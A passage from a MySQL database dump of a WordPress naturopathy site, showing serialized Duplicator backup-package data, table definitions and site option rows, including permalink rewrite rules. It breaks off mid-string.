insertedRows\";i:13;s:4:\"size\";i:3345;}s:18:\"wpln_term_taxonomy\";a:3:{s:14:\"inaccurateRows\";i:17;s:12:\"insertedRows\";i:17;s:4:\"size\";i:4684;}s:13:\"wpln_termmeta\";a:3:{s:14:\"inaccurateRows\";i:11;s:12:\"insertedRows\";i:11;s:4:\"size\";i:10808;}s:10:\"wpln_terms\";a:3:{s:14:\"inaccurateRows\";i:17;s:12:\"insertedRows\";i:17;s:4:\"size\";i:13840;}s:13:\"wpln_usermeta\";a:3:{s:14:\"inaccurateRows\";i:25;s:12:\"insertedRows\";i:25;s:4:\"size\";i:12548;}s:10:\"wpln_users\";a:3:{s:14:\"inaccurateRows\";i:1;s:12:\"insertedRows\";i:1;s:4:\"size\";i:8348;}}s:19:\"lowerCaseTableNames\";i:0;s:8:\"dbEngine\";s:5:\"MySQL\";s:7:\"version\";s:6:\"8.0.43\";s:14:\"versionComment\";s:28:\"MySQL Community Server - GPL\";s:9:\"viewCount\";i:0;s:9:\"procCount\";i:0;s:9:\"funcCount\";i:0;s:11:\"triggerList\";a:0:{}s:33:\"\0DUP_DatabaseInfo\0intFieldsStruct\";a:0:{}s:42:\"\0DUP_DatabaseInfo\0indexProcessedSchemaSize\";a:0:{}}s:10:\"\0*\0Package\";r:1;s:24:\"\0DUP_Database\0tempDbPath\";s:145:\"/home/desid573/verdenaturopathy.com.au/wp-content/backups-dup-lite/tmp/20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_database.sql\";s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}s:13:\"BuildProgress\";O:18:\"DUP_Build_Progress\":12:{s:17:\"thread_start_time\";N;s:11:\"initialized\";b:0;s:15:\"installer_built\";b:1;s:15:\"archive_started\";b:0;s:20:\"archive_has_database\";b:0;s:13:\"archive_built\";b:0;s:21:\"database_script_built\";b:0;s:6:\"failed\";b:0;s:7:\"retries\";i:0;s:14:\"build_failures\";a:0:{}s:19:\"validation_failures\";a:0:{}s:27:\"\0DUP_Build_Progress\0package\";O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2025-10-22 09:19:12\";s:7:\"Version\";s:6:\"1.5.14\";s:9:\"VersionWP\";s:5:\"6.8.3\";s:9:\"VersionDB\";s:6:\"8.0.43\";s:10:\"VersionPHP\";s:6:\"7.4.33\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:25:\"20251022_verdenaturopathy\";s:4:\"Hash\";s:35:\"cb514b58d35557195673_20251022091912\";s:8:\"NameHash\";s:61:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:8:\"ScanFile\";N;s:10:\"TimerStart\";i:-1;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";i:0;s:6:\"WPUser\";N;s:7:\"Archive\";r:21;s:9:\"Installer\";r:84;s:8:\"Database\";r:227;s:13:\"BuildProgress\";r:359;}}}'); /*!40000 ALTER TABLE `wpln_duplicator_packages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_links` -- DROP TABLE IF EXISTS `wpln_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_links` ( `link_id` bigint unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_image` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_target` varchar(25) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_visible` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'Y', `link_owner` bigint unsigned NOT NULL DEFAULT '1', `link_rating` int NOT NULL DEFAULT '0', `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `link_notes` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `link_rss` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_links` -- LOCK TABLES `wpln_links` WRITE; /*!40000 ALTER TABLE `wpln_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wpln_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_monsterinsights_tracking_events` -- DROP TABLE IF EXISTS `wpln_monsterinsights_tracking_events`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_monsterinsights_tracking_events` ( `id` mediumint NOT NULL AUTO_INCREMENT, `name` tinytext COLLATE utf8mb4_unicode_520_ci NOT NULL, `status` tinytext COLLATE utf8mb4_unicode_520_ci NOT NULL, `payload` text COLLATE utf8mb4_unicode_520_ci, `extra_data` text COLLATE utf8mb4_unicode_520_ci, `attempts` tinyint NOT NULL DEFAULT '0', `last_error` text COLLATE utf8mb4_unicode_520_ci, `created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_monsterinsights_tracking_events` -- LOCK TABLES `wpln_monsterinsights_tracking_events` WRITE; /*!40000 ALTER TABLE `wpln_monsterinsights_tracking_events` DISABLE KEYS */; /*!40000 ALTER TABLE `wpln_monsterinsights_tracking_events` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_options` -- DROP TABLE IF EXISTS `wpln_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_options` ( `option_id` bigint unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(191) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `option_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `autoload` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`), KEY `autoload` (`autoload`) ) ENGINE=MyISAM AUTO_INCREMENT=214872 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_options` -- LOCK TABLES `wpln_options` WRITE; /*!40000 ALTER TABLE `wpln_options` DISABLE KEYS */; INSERT INTO `wpln_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1,'siteurl','https://verdenaturopathy.com.au','yes'),(2,'home','https://verdenaturopathy.com.au','yes'),(3,'blogname','Verde Naturopathy','yes'),(4,'blogdescription','food + plants as medicine','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','mel-cann@live.com.au','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:363:{s:10:\"project/?$\";s:27:\"index.php?post_type=project\";s:40:\"project/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:35:\"project/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:27:\"project/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=project&paged=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:56:\"layout_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?layout_category=$matches[1]&feed=$matches[2]\";s:51:\"layout_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?layout_category=$matches[1]&feed=$matches[2]\";s:32:\"layout_category/([^/]+)/embed/?$\";s:48:\"index.php?layout_category=$matches[1]&embed=true\";s:44:\"layout_category/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?layout_category=$matches[1]&paged=$matches[2]\";s:26:\"layout_category/([^/]+)/?$\";s:37:\"index.php?layout_category=$matches[1]\";s:51:\"layout_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?layout_tag=$matches[1]&feed=$matches[2]\";s:46:\"layout_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?layout_tag=$matches[1]&feed=$matches[2]\";s:27:\"layout_tag/([^/]+)/embed/?$\";s:43:\"index.php?layout_tag=$matches[1]&embed=true\";s:39:\"layout_tag/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?layout_tag=$matches[1]&paged=$matches[2]\";s:21:\"layout_tag/([^/]+)/?$\";s:32:\"index.php?layout_tag=$matches[1]\";s:52:\"layout_pack/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_pack=$matches[1]&feed=$matches[2]\";s:47:\"layout_pack/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_pack=$matches[1]&feed=$matches[2]\";s:28:\"layout_pack/([^/]+)/embed/?$\";s:44:\"index.php?layout_pack=$matches[1]&embed=true\";s:40:\"layout_pack/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?layout_pack=$matches[1]&paged=$matches[2]\";s:22:\"layout_pack/([^/]+)/?$\";s:33:\"index.php?layout_pack=$matches[1]\";s:52:\"layout_type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_type=$matches[1]&feed=$matches[2]\";s:47:\"layout_type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_type=$matches[1]&feed=$matches[2]\";s:28:\"layout_type/([^/]+)/embed/?$\";s:44:\"index.php?layout_type=$matches[1]&embed=true\";s:40:\"layout_type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?layout_type=$matches[1]&paged=$matches[2]\";s:22:\"layout_type/([^/]+)/?$\";s:33:\"index.php?layout_type=$matches[1]\";s:53:\"module_width/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?module_width=$matches[1]&feed=$matches[2]\";s:48:\"module_width/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?module_width=$matches[1]&feed=$matches[2]\";s:29:\"module_width/([^/]+)/embed/?$\";s:45:\"index.php?module_width=$matches[1]&embed=true\";s:41:\"module_width/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?module_width=$matches[1]&paged=$matches[2]\";s:23:\"module_width/([^/]+)/?$\";s:34:\"index.php?module_width=$matches[1]\";s:46:\"scope/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?scope=$matches[1]&feed=$matches[2]\";s:41:\"scope/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?scope=$matches[1]&feed=$matches[2]\";s:22:\"scope/([^/]+)/embed/?$\";s:38:\"index.php?scope=$matches[1]&embed=true\";s:34:\"scope/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?scope=$matches[1]&paged=$matches[2]\";s:16:\"scope/([^/]+)/?$\";s:27:\"index.php?scope=$matches[1]\";s:40:\"et_pb_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"et_pb_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"et_pb_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"et_pb_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"et_pb_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"et_pb_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"et_pb_layout/([^/]+)/embed/?$\";s:60:\"index.php?post_type=et_pb_layout&name=$matches[1]&embed=true\";s:33:\"et_pb_layout/([^/]+)/trackback/?$\";s:54:\"index.php?post_type=et_pb_layout&name=$matches[1]&tb=1\";s:41:\"et_pb_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:67:\"index.php?post_type=et_pb_layout&name=$matches[1]&paged=$matches[2]\";s:48:\"et_pb_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?post_type=et_pb_layout&name=$matches[1]&cpage=$matches[2]\";s:37:\"et_pb_layout/([^/]+)(?:/([0-9]+))?/?$\";s:66:\"index.php?post_type=et_pb_layout&name=$matches[1]&page=$matches[2]\";s:29:\"et_pb_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"et_pb_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"et_pb_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"et_pb_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"et_pb_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"et_pb_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:56:\"et_tb_item_type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?et_tb_item_type=$matches[1]&feed=$matches[2]\";s:51:\"et_tb_item_type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?et_tb_item_type=$matches[1]&feed=$matches[2]\";s:32:\"et_tb_item_type/([^/]+)/embed/?$\";s:48:\"index.php?et_tb_item_type=$matches[1]&embed=true\";s:44:\"et_tb_item_type/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?et_tb_item_type=$matches[1]&paged=$matches[2]\";s:26:\"et_tb_item_type/([^/]+)/?$\";s:37:\"index.php?et_tb_item_type=$matches[1]\";s:38:\"et_tb_item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"et_tb_item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"et_tb_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"et_tb_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"et_tb_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"et_tb_item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"et_tb_item/([^/]+)/embed/?$\";s:58:\"index.php?post_type=et_tb_item&name=$matches[1]&embed=true\";s:31:\"et_tb_item/([^/]+)/trackback/?$\";s:52:\"index.php?post_type=et_tb_item&name=$matches[1]&tb=1\";s:39:\"et_tb_item/([^/]+)/page/?([0-9]{1,})/?$\";s:65:\"index.php?post_type=et_tb_item&name=$matches[1]&paged=$matches[2]\";s:46:\"et_tb_item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?post_type=et_tb_item&name=$matches[1]&cpage=$matches[2]\";s:35:\"et_tb_item/([^/]+)(?:/([0-9]+))?/?$\";s:64:\"index.php?post_type=et_tb_item&name=$matches[1]&page=$matches[2]\";s:27:\"et_tb_item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"et_tb_item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"et_tb_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"et_tb_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"et_tb_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"et_tb_item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"project/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"project/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"project/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"project/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"project/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"project/([^/]+)/embed/?$\";s:40:\"index.php?project=$matches[1]&embed=true\";s:28:\"project/([^/]+)/trackback/?$\";s:34:\"index.php?project=$matches[1]&tb=1\";s:48:\"project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?project=$matches[1]&feed=$matches[2]\";s:43:\"project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?project=$matches[1]&feed=$matches[2]\";s:36:\"project/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?project=$matches[1]&paged=$matches[2]\";s:43:\"project/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?project=$matches[1]&cpage=$matches[2]\";s:32:\"project/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?project=$matches[1]&page=$matches[2]\";s:24:\"project/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"project/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"project/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"project/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"project/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:57:\"project_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?project_category=$matches[1]&feed=$matches[2]\";s:52:\"project_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?project_category=$matches[1]&feed=$matches[2]\";s:33:\"project_category/([^/]+)/embed/?$\";s:49:\"index.php?project_category=$matches[1]&embed=true\";s:45:\"project_category/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?project_category=$matches[1]&paged=$matches[2]\";s:27:\"project_category/([^/]+)/?$\";s:38:\"index.php?project_category=$matches[1]\";s:52:\"project_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?project_tag=$matches[1]&feed=$matches[2]\";s:47:\"project_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?project_tag=$matches[1]&feed=$matches[2]\";s:28:\"project_tag/([^/]+)/embed/?$\";s:44:\"index.php?project_tag=$matches[1]&embed=true\";s:40:\"project_tag/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?project_tag=$matches[1]&paged=$matches[2]\";s:22:\"project_tag/([^/]+)/?$\";s:33:\"index.php?project_tag=$matches[1]\";s:48:\"monsterinsights_note/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:58:\"monsterinsights_note/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:78:\"monsterinsights_note/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:73:\"monsterinsights_note/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:73:\"monsterinsights_note/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:54:\"monsterinsights_note/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"monsterinsights_note/([^/]+)/embed/?$\";s:53:\"index.php?monsterinsights_note=$matches[1]&embed=true\";s:41:\"monsterinsights_note/([^/]+)/trackback/?$\";s:47:\"index.php?monsterinsights_note=$matches[1]&tb=1\";s:49:\"monsterinsights_note/([^/]+)/page/?([0-9]{1,})/?$\";s:60:\"index.php?monsterinsights_note=$matches[1]&paged=$matches[2]\";s:56:\"monsterinsights_note/([^/]+)/comment-page-([0-9]{1,})/?$\";s:60:\"index.php?monsterinsights_note=$matches[1]&cpage=$matches[2]\";s:45:\"monsterinsights_note/([^/]+)(?:/([0-9]+))?/?$\";s:59:\"index.php?monsterinsights_note=$matches[1]&page=$matches[2]\";s:37:\"monsterinsights_note/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"monsterinsights_note/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"monsterinsights_note/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"monsterinsights_note/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"monsterinsights_note/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"monsterinsights_note/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:70:\"monsterinsights_note_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:68:\"index.php?monsterinsights_note_category=$matches[1]&feed=$matches[2]\";s:65:\"monsterinsights_note_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:68:\"index.php?monsterinsights_note_category=$matches[1]&feed=$matches[2]\";s:46:\"monsterinsights_note_category/([^/]+)/embed/?$\";s:62:\"index.php?monsterinsights_note_category=$matches[1]&embed=true\";s:58:\"monsterinsights_note_category/([^/]+)/page/?([0-9]{1,})/?$\";s:69:\"index.php?monsterinsights_note_category=$matches[1]&paged=$matches[2]\";s:40:\"monsterinsights_note_category/([^/]+)/?$\";s:51:\"index.php?monsterinsights_note_category=$matches[1]\";s:44:\"et_theme_options/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"et_theme_options/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"et_theme_options/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_theme_options/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_theme_options/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"et_theme_options/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"et_theme_options/([^/]+)/embed/?$\";s:64:\"index.php?post_type=et_theme_options&name=$matches[1]&embed=true\";s:37:\"et_theme_options/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=et_theme_options&name=$matches[1]&tb=1\";s:45:\"et_theme_options/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_theme_options&name=$matches[1]&paged=$matches[2]\";s:52:\"et_theme_options/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_theme_options&name=$matches[1]&cpage=$matches[2]\";s:41:\"et_theme_options/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=et_theme_options&name=$matches[1]&page=$matches[2]\";s:33:\"et_theme_options/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"et_theme_options/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"et_theme_